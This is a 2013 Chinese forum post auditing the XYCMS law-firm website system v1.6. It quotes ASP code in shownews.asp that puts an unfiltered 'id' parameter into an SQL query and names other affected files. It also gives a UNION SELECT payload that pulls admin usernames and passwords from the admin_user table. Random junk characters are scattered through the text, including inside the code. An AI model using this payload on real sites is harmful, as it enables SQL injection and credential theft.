前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
5 Z5 h1 c' p# i! [) b9 I : M% `7 n7 Z- @( V t$ T
淫荡分割线
; O, h& b0 r7 d, O* D# ^--------------------------------------------------------
+ D1 ]- r; \6 W0 @* N ) \& t) g& \. f! ~4 i! f) o
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
1 x5 \7 Z3 f& K5 Q源码地址:http://down.chinaz.com/soft/29233.htm
$ l3 B$ Q; e8 w: W5 C/ d ! d7 H* i5 c; j; l3 I
漏洞文件:shownews.asp4 D+ O- \# P9 K0 e5 k( F X
漏洞代码:7-13行# r! a2 O+ E5 Z: [: H2 W. q
) v- |7 y$ O0 r: p, k n0 c
% ?7 f" E' ]1 T! U6 Y<% 9 [4 K3 ^6 |, u+ H3 c
id=request.QueryString("id")) {' N+ a: _7 O( T. {
' E; c7 s! g l0 u; a! ]1 I0 _) jset snews=server.createobject("adodb.recordset") , Q& K$ M3 l/ u8 M0 v& W9 Z- D
exec="select * from [news] where id="&id1 ~8 k" X) o V4 r# Z8 s" v
snews.open exec,conn,1,1
7 X6 s7 i& w$ P$ G! J# q6 W0 E%>7 P1 W+ _8 q5 o" i$ h2 R. S4 ~
_3 \$ E3 H6 m" `4 a$ k
* q- I Y! Z) ^( z* Y' x什么过滤都没有 直造成注入
} Y. z. S1 Y X6 D
2 D! a% X1 Z8 o8 {注入点:http://127.0.0.1:99/shownews.asp?id=xx1 Y# C6 I8 X2 Z8 R# ]* V, Q
+ T0 j$ }# E: O# r) J
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找7 S5 l6 p- {+ t2 K2 ]$ [% u: |
! g* c3 |. ]/ Z4 A
4 d/ K) _5 _: K& |
exp: union select 1,admin,password,4,5,7 from admin_user
7 v6 f5 a( {. m: b
4 E, K7 x! l6 W6 x; Y |
发表于 2013-4-4 17:28:12
收藏
支持
反对